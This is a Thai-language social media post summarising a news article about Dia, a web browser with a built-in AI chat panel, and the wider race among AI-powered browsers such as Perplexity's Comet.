    🎙️ เรื่องเล่าจากเบราว์เซอร์ที่คิดแทนเรา: เมื่อหน้าจอเว็บมี AI ช่วยตลอดทาง Dia ไม่ใช่แค่เบราว์เซอร์ทั่วไปอย่าง Chrome หรือ Safari — แต่เป็นเบราว์เซอร์ที่มีช่องแชต AI อยู่เคียงข้างหน้าต่างเว็บแบบ in-app โดยกด shortcut (Command+E) เพื่อเรียกกล่องคำถามขึ้นมาข้างหน้าเว็บ ตัวอย่างจากผู้ใช้: - อ่านข่าวน้ำท่วมในเท็กซัส → พิมพ์ถาม AI เพื่อขอสรุปและแหล่งข้อมูลเพิ่ม - ดูวิดีโอรีวิวอุปกรณ์ Jump Starter → ให้ AI ดึง transcript มาสรุปข้อเด่นโดยไม่ต้องดูเอง - เขียนบน Google Docs → ถาม AI ว่าใช้คำว่า “on the cusp” ถูกไหม แล้วรับคำตอบทันที ที่สำคัญ Dia เลือก “โมเดล AI ที่เหมาะที่สุด” ให้แบบอัตโนมัติ เช่นถามเรื่องโค้ด → ใช้ Claude Sonnet / ถามเรื่องภาษา → ใช้ GPT จาก OpenAI โดยไม่ต้องเลือกเอง สัปดาห์เดียวกันนี้ Perplexity ก็เปิดตัวเบราว์เซอร์ AI ชื่อ Comet และมีรายงานว่า OpenAI เตรียมออกเบราว์เซอร์ AI เช่นกัน แปลว่า “ยุคเบราว์เซอร์ฉลาด” กำลังมาเร็วมาก ✅ Dia เป็นเบราว์เซอร์ใหม่ที่รวมแชตบอท AI เข้ากับหน้าเว็บโดยตรง ➡️ กด Command+E เพื่อเปิดหน้าต่าง AI เคียงข้างหน้าเว็บ ✅ Dia ดึงคำตอบจากหลายโมเดล AI เช่น ChatGPT, Gemini, Claude โดยเลือกให้ผู้ใช้อัตโนมัติ ➡️ เช่นใช้ Claude ถามเรื่องโค้ด, ใช้ GPT ถามเรื่องภาษา ✅ ตัวเบราว์เซอร์สามารถสรุปวิดีโอ, ข่าว, และช่วยพิสูจน์อักษรได้ทันทีจากหน้าเว็บ ➡️ ไม่ต้องเปิดแอป AI แยกหรือก็อปปี้เนื้อหาไปใส่ทีละขั้น ✅ Dia ยังไม่เปิดตัวทั่วไป แต่ให้ทดลองฟรีบน Mac แบบเชิญเท่านั้น ➡️ จะเปิดแพ็กเกจ subscription เริ่มต้น $5/เดือนในอีกไม่กี่สัปดาห์ ✅ เบราว์เซอร์ AI จาก Perplexity (Comet) และ OpenAI ก็ถูกพูดถึงในช่วงเวลาเดียวกัน ➡️ แสดงถึงการแข่งขันในตลาด AI-powered browser กำลังร้อนแรง ✅ Google และ Apple ก็เริ่มใส่ฟีเจอร์ AI เล็ก ๆ เช่นการสรุปบทความใน Chrome และ Safari ➡️ แต่ยังไม่ถึงระดับการรวม chatbot แบบ Dia ✅ นักลงทุนคาดว่า AI browser จะเป็น “จุดเริ่มต้นใหม่” ของการใช้งาน generative AI ในชีวิตประจำวัน ➡️ แทนที่การใช้แบบเดิมที่ต้องเปิดแอป AI แยก https://www.thestar.com.my/tech/tech-news/2025/07/23/is-ai-the-future-of-web-browsing
    WWW.THESTAR.COM.MY
    Is AI the future of web browsing?
    A test of the app Dia illustrates that the humble web browser may be the path to making artificial intelligence more natural to use.
    0 ความคิดเห็น 0 การแบ่งปัน 201 มุมมอง 0 รีวิว
Pages Boosts